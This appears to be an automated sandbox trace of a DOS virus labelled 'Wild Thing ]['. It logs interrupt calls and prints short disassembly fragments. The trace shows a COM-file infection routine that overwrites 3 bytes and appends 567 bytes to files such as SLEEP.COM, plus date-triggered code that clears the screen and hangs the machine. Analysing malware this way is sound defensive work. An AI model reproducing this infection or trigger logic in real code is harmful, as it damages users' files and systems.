2018-12-25T12:42:07.377852222Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:07.386436799Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:07.396402672Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:07.39916763Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:07.405551016Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:07.415260285Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:07.426965818Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:07.429201988Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:07.435717052Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:07.437382263Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:07.44531993Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:07.455408338Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:07.457955175Z 59 PC: 12b48 | Change current directory
2018-12-25T12:42:07.462954575Z 59 PC: 12b52 | Change current directory
2018-12-25T12:42:07.465216294Z 26 PC: 12c51 | Set disk transfer address (See above)
2018-12-25T12:42:07.466523164Z 9 PC: 12b6a | Display string (String= 'Wild Thing ][ ')
2018-12-25T12:42:09.676538315Z 72 PC: 8f1b9 | Allocate memory
2018-12-25T12:42:09.67892868Z 72 PC: 8f1bd | Allocate memory
2018-12-25T12:42:09.681394178Z 99 PC: 90858 | Get DBCS lead byte table pointer
2018-12-25T12:42:09.685276963Z 61 PC: 91f88 | Open file (Filename = 'C:\WINDOWS\HIMEM.SYS')
2018-12-25T12:42:09.696583864Z 66 PC: 91f95 | Move file pointer
2018-12-25T12:42:09.698061632Z 62 PC: 91fc1 | Close file
2018-12-25T12:42:09.700315139Z 75 PC: 91fe0 | Execute program
2018-12-25T12:42:09.716489141Z 98 PC: 916f1 | Get current PSP
2018-12-25T12:42:09.718082592Z 9 PC: c605 | Display string (String= '6��r�&;] u')
2018-12-25T12:42:09.722560657Z 48 PC: c609 | Get DOS version
2018-12-25T12:42:09.726555621Z 9 PC: c382 | Display string (String= ' Installed A20 handler number ')
2018-12-25T12:42:09.728911115Z 2 PC: c38c | Character output (Char = '32')
2018-12-25T12:42:09.731084779Z 2 PC: c3a7 | Character output (Char = '2e')
2018-12-25T12:42:09.734953086Z 9 PC: c6d9 | Display string (String= '�����VH�VD���V@��������������_���Ku��t1��������D�����t �� ��������a1��Z�����W���� ������5���|�����(���������Nj�(��������p�^')
2018-12-25T12:42:09.739818408Z 9 PC: c6e0 | Display string (String= '�5���|�����(���������Nj�(��������p�^')
2018-12-25T12:42:09.744939003Z 61 PC: 91f88 | Open file (See above)
2018-12-25T12:42:09.755924177Z 66 PC: 91f95 | Move file pointer (See above)
2018-12-25T12:42:09.757631589Z 62 PC: 91fc1 | Close file (See above)
2018-12-25T12:42:09.759937382Z 75 PC: 91fe0 | Execute program (See above)
2018-12-25T12:42:09.780330611Z 98 PC: 916f1 | Get current PSP (See above)
2018-12-25T12:42:09.784305463Z 82 PC: 13d46 | Get DOS internal pointers (SYSVARS)
2018-12-25T12:42:09.785884277Z 53 PC: 13ac3 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:42:09.787782759Z 37 PC: 13ad6 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:42:09.789179307Z 53 PC: 13ae0 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:09.790593319Z 37 PC: 13af3 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:09.792197944Z 9 PC: 13a0d | Display string (Could not find end pointer)
2018-12-25T12:42:09.800414656Z 62 PC: 8f8eb | Close file
2018-12-25T12:42:09.802435239Z 62 PC: 8f8f2 | Close file
2018-12-25T12:42:09.80598733Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.807695338Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.809530957Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.8116674Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.813170771Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.814728341Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.816380584Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.818016435Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.819669321Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.822168974Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.823762571Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.825082813Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.828553345Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.830080189Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.831746314Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.833798118Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.835216517Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.836519489Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.838609846Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.839915976Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.841214474Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.843200885Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.844672474Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.846137092Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.848514168Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.85000087Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.851378548Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.853735021Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.855063557Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:09.856378118Z 61 PC: 8f8ff | Open file (Filename = '')
2018-12-25T12:42:09.861585142Z 62 PC: 8f90e | Close file
2018-12-25T12:42:09.863323755Z 69 PC: 8f915 | Duplicate handle
2018-12-25T12:42:09.864778205Z 69 PC: 8f919 | Duplicate handle
2018-12-25T12:42:09.867179595Z 61 PC: 9387b | Open file (Filename = '')
2018-12-25T12:42:09.874942919Z 68 PC: 9386b | I/O control for devices (Set for = '')
2018-12-25T12:42:09.876206284Z 61 PC: 9387b | Open file (See above)
2018-12-25T12:42:09.890269976Z 68 PC: 9386b | I/O control for devices (See above)
2018-12-25T12:42:09.891704004Z 74 PC: 8f9c4 | Reallocate memory
2018-12-25T12:42:09.892881653Z 72 PC: 8f9e0 | Allocate memory
2018-12-25T12:42:09.895123313Z 72 PC: 8f9e4 | Allocate memory
2018-12-25T12:42:09.896422989Z 74 PC: 8f9fb | Reallocate memory
2018-12-25T12:42:09.897551683Z 72 PC: 8fa02 | Allocate memory
2018-12-25T12:42:09.899479246Z 72 PC: 8fa06 | Allocate memory
2018-12-25T12:42:09.90084123Z 73 PC: 8fa11 | Release memory
2018-12-25T12:42:09.902099383Z 73 PC: 8efea | Release memory
2018-12-25T12:42:09.903750526Z 74 PC: 8f003 | Reallocate memory
2018-12-25T12:42:09.90541269Z 72 PC: 8f054 | Allocate memory
2018-12-25T12:42:09.907076464Z 72 PC: 8f058 | Allocate memory
2018-12-25T12:42:09.908842221Z 73 PC: 8f060 | Release memory
2018-12-25T12:42:09.909940967Z 61 PC: 8f080 | Open file (Filename = '')
2018-12-25T12:42:09.918502475Z 63 PC: 8f095 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:42:09.924149728Z 66 PC: 8f0ad | Move file pointer
2018-12-25T12:42:09.925400706Z 62 PC: 8f0d1 | Close file
2018-12-25T12:42:09.926871801Z 75 PC: 8f0f2 | Execute program
2018-12-25T12:42:09.948543873Z 80 PC: 12be9 | Set current PSP
2018-12-25T12:42:09.949514201Z 48 PC: 12bee | Get DOS version
2018-12-25T12:42:09.951312801Z 99 PC: 193d0 | Get DBCS lead byte table pointer
2018-12-25T12:42:09.956015795Z 101 PC: 12c74 | Get extended country info
2018-12-25T12:42:09.957810468Z 99 PC: 12c7a | Get DBCS lead byte table pointer
2018-12-25T12:42:09.959205298Z 74 PC: 12cdc | Reallocate memory
2018-12-25T12:42:09.961882013Z 72 PC: 1355d | Allocate memory
2018-12-25T12:42:09.963782047Z 25 PC: 13596 | Get default drive
2018-12-25T12:42:09.965225918Z 71 PC: 135ad | Get current directory
2018-12-25T12:42:09.968726113Z 59 PC: 135ba | Change current directory
2018-12-25T12:42:09.973927625Z 59 PC: 135c8 | Change current directory
2018-12-25T12:42:09.979564263Z 59 PC: 135d3 | Change current directory
2018-12-25T12:42:09.984331947Z 25 PC: 12d13 | Get default drive
2018-12-25T12:42:09.985760801Z 37 PC: 127d3 | Set interrupt vector (Interrupt = '34' AKA 'Random write')
2018-12-25T12:42:09.987151565Z 37 PC: 127da | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T12:42:09.989732116Z 37 PC: 127e1 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:42:09.992103375Z 80 PC: 1301d | Set current PSP
2018-12-25T12:42:09.993351377Z 37 PC: 13041 | Set interrupt vector (Interrupt = '46' AKA 'Set verify flag')
2018-12-25T12:42:09.995489623Z 53 PC: 13362 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:09.99677517Z 37 PC: 13383 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:09.999833881Z 51 PC: 13417 | Get or set Ctrl-Break
2018-12-25T12:42:10.002537131Z 72 PC: 130ec | Allocate memory
2018-12-25T12:42:10.004550766Z 61 PC: 131b2 | Open file (Filename = '')
2018-12-25T12:42:10.01174255Z 62 PC: 131ba | Close file
2018-12-25T12:42:10.014108535Z 51 PC: 1344c | Get or set Ctrl-Break
2018-12-25T12:42:10.016209884Z 74 PC: 1197c | Reallocate memory
2018-12-25T12:42:10.018559406Z 72 PC: 11991 | Allocate memory
2018-12-25T12:42:10.021003563Z 73 PC: 119b2 | Release memory
2018-12-25T12:42:10.022567345Z 72 PC: 119bd | Allocate memory
2018-12-25T12:42:10.025533086Z 73 PC: 119df | Release memory
2018-12-25T12:42:10.02705237Z 72 PC: 119f5 | Allocate memory
2018-12-25T12:42:10.029102635Z 72 PC: 119fd | Allocate memory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":14903,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:42:07.179696199Z 26 PC: 12c51 | Set disk transfer address
2018-12-25T12:42:07.181341405Z 44 PC: 12b0e | Get time
0x12b0e: cmp dh, 0
0x12b11: je 0x12b0a
0x12b13: mov byte ptr cs:[bp + 0x338], dh
0x12b18: mov ah, 0x47
0x12b1a: mov dl, 0
0x12b1c: lea si, word ptr [bp + 0x354]
0x12b20: int 0x21
0x12b22: call 0x12c13
0x12b25: call 0x12c37
0x12b28: mov ah, 0x4e
0x12b2a: lea dx, word ptr [bp + 0x2d4]
0x12b2e: mov cx, 7
0x12b31: int 0x21
0x12b33: jb 0x12b40
0x12b35: lea dx, word ptr [bp + 0x3b2]
0x12b39: call 0x12b75
0x12b3c: mov ah, 0x4f
0x12b3e: jmp 0x12b31
0x12b40: lea dx, word ptr [bp + 0x2ea]
0x12b44: mov ah, 0x3b
2018-12-25T12:42:07.183620592Z 71 PC: 12b22 | Get current directory
2018-12-25T12:42:07.186742466Z 42 PC: 12c17 | Get date
0x12c17: cmp al, 5
0x12c19: je 0x12c1c
0x12c1b: ret
0x12c1c: mov ah, 1
0x12c1e: mov cx, 0x2020
0x12c21: int 0x10
0x12c23: mov ah, 2
0x12c25: xor dx, dx
0x12c27: int 0x10
0x12c29: xor ax, ax
0x12c2b: int 0x10
0x12c2d: mov ah, 9
0x12c2f: lea dx, word ptr [bp + 0x27a]
0x12c33: int 0x21
0x12c35: jmp 0x12c35
0x12c37: mov ah, 0x4e
0x12c39: lea dx, word ptr [bp + 0x2da]
0x12c3d: mov cx, 7
0x12c40: int 0x21
0x12c42: jae 0x12c45
2018-12-25T12:42:07.190109289Z 78 PC: 12c42 | Find first file
2018-12-25T12:42:07.196706102Z 78 PC: 12b33 | Find first file
2018-12-25T12:42:07.209306074Z 67 PC: 12b7b | Get or set file attributes
2018-12-25T12:42:07.215666262Z 67 PC: 12b89 | Get or set file attributes
2018-12-25T12:42:07.880566477Z 61 PC: 12b90 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:42:07.888738844Z 87 PC: 12b98 | Get or set file date and time
2018-12-25T12:42:07.890741104Z 63 PC: 12bad | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:42:07.908674631Z 66 PC: 12c12 | Move file pointer
2018-12-25T12:42:07.91033109Z 64 PC: 12be1 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:42:07.913244829Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:07.915978816Z 64 PC: 12d36 | Write file or device (Write 567 bytes on handle 5)
2018-12-25T12:42:07.958726448Z 87 PC: 12bf8 | Get or set file date and time
2018-12-25T12:42:07.960422493Z 62 PC: 12bfc | Close file
2018-12-25T12:42:08.024558365Z 67 PC: 12c07 | Get or set file attributes
2018-12-25T12:42:08.079179906Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.081328669Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.086198744Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.130799755Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.138369001Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.140880513Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.148205243Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.149811981Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.152887847Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.155614568Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.207641768Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.211005946Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.22802579Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.239311265Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.242219573Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.249966939Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.259391524Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.2716927Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.274810508Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.283403911Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.285452099Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.289683469Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.292716574Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.302470107Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.304558202Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.314647242Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.326508603Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.33010238Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.336273142Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.345072417Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.352804102Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.355187397Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.363156507Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.365216437Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.369621295Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.372394899Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.381889898Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.384870609Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.394221782Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.406563918Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.410278814Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.418107798Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.431320425Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.435714094Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.437945836Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.442386602Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.443619461Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.446086007Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.447458306Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.452877132Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.454811774Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.463517977Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.475226233Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.479957066Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.487231026Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.498895718Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.507181254Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.510352128Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.517979133Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.51929796Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.52228255Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.523704474Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.530414987Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.533497148Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.544077338Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.555616634Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.559656753Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.566977102Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.578495819Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.588080715Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.590461113Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.598537387Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.600437824Z 64 PC: 12be1 | Write file or device (See above)
2018-12-25T12:42:08.604747346Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T12:42:08.607117779Z 64 PC: 12d36 | Write file or device (See above)
2018-12-25T12:42:08.616225926Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.619315925Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.628167294Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.639836887Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.644055289Z 67 PC: 12b7b | Get or set file attributes (See above)
2018-12-25T12:42:08.65094895Z 67 PC: 12b89 | Get or set file attributes (See above)
2018-12-25T12:42:08.66226068Z 61 PC: 12b90 | Open file (See above)
2018-12-25T12:42:08.67126636Z 87 PC: 12b98 | Get or set file date and time (See above)
2018-12-25T12:42:08.673334227Z 63 PC: 12bad | Read file or device (See above)
2018-12-25T12:42:08.680942855Z 87 PC: 12bf8 | Get or set file date and time (See above)
2018-12-25T12:42:08.683343499Z 62 PC: 12bfc | Close file (See above)
2018-12-25T12:42:08.691741721Z 67 PC: 12c07 | Get or set file attributes (See above)
2018-12-25T12:42:08.704556037Z 79 PC: 12b33 | Find next file (See above)
2018-12-25T12:42:08.707466595Z 59 PC: 12b48 | Change current directory
2018-12-25T12:42:08.713087236Z 59 PC: 12b52 | Change current directory
2018-12-25T12:42:08.715241614Z 26 PC: 12c51 | Set disk transfer address (See above)
2018-12-25T12:42:08.716529256Z 9 PC: 12b6a | Display string (String= 'Wild Thing ][ ')
2018-12-25T12:42:10.923057812Z 72 PC: 8f1b9 | Allocate memory
2018-12-25T12:42:10.925874099Z 72 PC: 8f1bd | Allocate memory
2018-12-25T12:42:10.928857923Z 99 PC: 90858 | Get DBCS lead byte table pointer
2018-12-25T12:42:10.933391445Z 61 PC: 91f88 | Open file (Filename = 'C:\WINDOWS\HIMEM.SYS')
2018-12-25T12:42:10.945818821Z 66 PC: 91f95 | Move file pointer
2018-12-25T12:42:10.947544715Z 62 PC: 91fc1 | Close file
2018-12-25T12:42:10.950407792Z 75 PC: 91fe0 | Execute program
2018-12-25T12:42:10.970204649Z 98 PC: 916f1 | Get current PSP
2018-12-25T12:42:10.971733239Z 9 PC: c605 | Display string (String= [non-printable bytes])
2018-12-25T12:42:10.976483141Z 48 PC: c609 | Get DOS version
2018-12-25T12:42:10.98130309Z 9 PC: c382 | Display string (String= ' Installed A20 handler number ')
2018-12-25T12:42:10.984753709Z 2 PC: c38c | Character output (Char = '32')
2018-12-25T12:42:10.987217411Z 2 PC: c3a7 | Character output (Char = '2e')
2018-12-25T12:42:10.992333852Z 9 PC: c6d9 | Display string (String= [non-printable bytes])
2018-12-25T12:42:10.997122657Z 9 PC: c6e0 | Display string (String= [non-printable bytes])
2018-12-25T12:42:11.004170699Z 61 PC: 91f88 | Open file (See above)
2018-12-25T12:42:11.017235393Z 66 PC: 91f95 | Move file pointer (See above)
2018-12-25T12:42:11.019659349Z 62 PC: 91fc1 | Close file (See above)
2018-12-25T12:42:11.022427329Z 75 PC: 91fe0 | Execute program (See above)
2018-12-25T12:42:11.047026628Z 98 PC: 916f1 | Get current PSP (See above)
2018-12-25T12:42:11.053162834Z 82 PC: 13d46 | Get DOS internal pointers (SYSVARS)
2018-12-25T12:42:11.055062788Z 53 PC: 13ac3 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:42:11.057090669Z 37 PC: 13ad6 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:42:11.059707787Z 53 PC: 13ae0 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:11.061421042Z 37 PC: 13af3 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:11.062905041Z 9 PC: 13a0d | Display string (Could not find end pointer)
2018-12-25T12:42:11.071848727Z 62 PC: 8f8eb | Close file
2018-12-25T12:42:11.075768947Z 62 PC: 8f8f2 | Close file
2018-12-25T12:42:11.078256778Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.081127616Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.082740118Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.08433589Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.086727118Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.088531942Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.09080366Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.093335368Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.095126171Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.097219087Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.09975818Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.101479628Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.103160443Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.110158446Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.111901807Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.11378568Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.116015917Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.118179252Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.120189231Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.122567379Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.124465257Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.126013788Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.128299589Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.130266556Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.133539036Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.136358082Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.14096975Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.142983971Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.145779445Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:42:11.1481084Z 61 PC: 8f8ff | Open file (Filename = '')
2018-12-25T12:42:11.153860355Z 62 PC: 8f90e | Close file
2018-12-25T12:42:11.156913269Z 69 PC: 8f915 | Duplicate handle
2018-12-25T12:42:11.159422399Z 69 PC: 8f919 | Duplicate handle
2018-12-25T12:42:11.162187664Z 61 PC: 9387b | Open file (Filename = '')
2018-12-25T12:42:11.169146943Z 68 PC: 9386b | I/O control for devices (Set for = '')
2018-12-25T12:42:11.171437917Z 61 PC: 9387b | Open file (See above)
2018-12-25T12:42:11.17752515Z 68 PC: 9386b | I/O control for devices (See above)
2018-12-25T12:42:11.180364444Z 74 PC: 8f9c4 | Reallocate memory
2018-12-25T12:42:11.182354539Z 72 PC: 8f9e0 | Allocate memory
2018-12-25T12:42:11.185315315Z 72 PC: 8f9e4 | Allocate memory
2018-12-25T12:42:11.187313001Z 74 PC: 8f9fb | Reallocate memory
2018-12-25T12:42:11.189899036Z 72 PC: 8fa02 | Allocate memory
2018-12-25T12:42:11.192285894Z 72 PC: 8fa06 | Allocate memory
2018-12-25T12:42:11.194558941Z 73 PC: 8fa11 | Release memory
2018-12-25T12:42:11.196902811Z 73 PC: 8efea | Release memory
2018-12-25T12:42:11.198489574Z 74 PC: 8f003 | Reallocate memory
2018-12-25T12:42:11.201134461Z 72 PC: 8f054 | Allocate memory
2018-12-25T12:42:11.20355905Z 72 PC: 8f058 | Allocate memory
2018-12-25T12:42:11.205264026Z 73 PC: 8f060 | Release memory
2018-12-25T12:42:11.206781461Z 61 PC: 8f080 | Open file (Filename = '')
2018-12-25T12:42:11.21913288Z 63 PC: 8f095 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:42:11.225533625Z 66 PC: 8f0ad | Move file pointer
2018-12-25T12:42:11.227081338Z 62 PC: 8f0d1 | Close file
2018-12-25T12:42:11.229313635Z 75 PC: 8f0f2 | Execute program
2018-12-25T12:42:11.256258575Z 80 PC: 12be9 | Set current PSP
2018-12-25T12:42:11.257306287Z 48 PC: 12bee | Get DOS version
2018-12-25T12:42:11.25976094Z 99 PC: 193d0 | Get DBCS lead byte table pointer
2018-12-25T12:42:11.263137037Z 101 PC: 12c74 | Get extended country info
2018-12-25T12:42:11.265230308Z 99 PC: 12c7a | Get DBCS lead byte table pointer
2018-12-25T12:42:11.267563039Z 74 PC: 12cdc | Reallocate memory
2018-12-25T12:42:11.269580854Z 72 PC: 1355d | Allocate memory
2018-12-25T12:42:11.271690266Z 25 PC: 13596 | Get default drive
2018-12-25T12:42:11.273989695Z 71 PC: 135ad | Get current directory
2018-12-25T12:42:11.276993418Z 59 PC: 135ba | Change current directory
2018-12-25T12:42:11.284089271Z 59 PC: 135c8 | Change current directory
2018-12-25T12:42:11.293092038Z 59 PC: 135d3 | Change current directory
2018-12-25T12:42:11.29797532Z 25 PC: 12d13 | Get default drive
2018-12-25T12:42:11.299885443Z 37 PC: 127d3 | Set interrupt vector (Interrupt = '34' AKA 'Random write')
2018-12-25T12:42:11.302048313Z 37 PC: 127da | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T12:42:11.303530392Z 37 PC: 127e1 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:42:11.306299107Z 80 PC: 1301d | Set current PSP
2018-12-25T12:42:11.308591007Z 37 PC: 13041 | Set interrupt vector (Interrupt = '46' AKA 'Set verify flag')
2018-12-25T12:42:11.313539604Z 53 PC: 13362 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:11.314821714Z 37 PC: 13383 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:42:11.31888658Z 51 PC: 13417 | Get or set Ctrl-Break
2018-12-25T12:42:11.321582865Z 72 PC: 130ec | Allocate memory
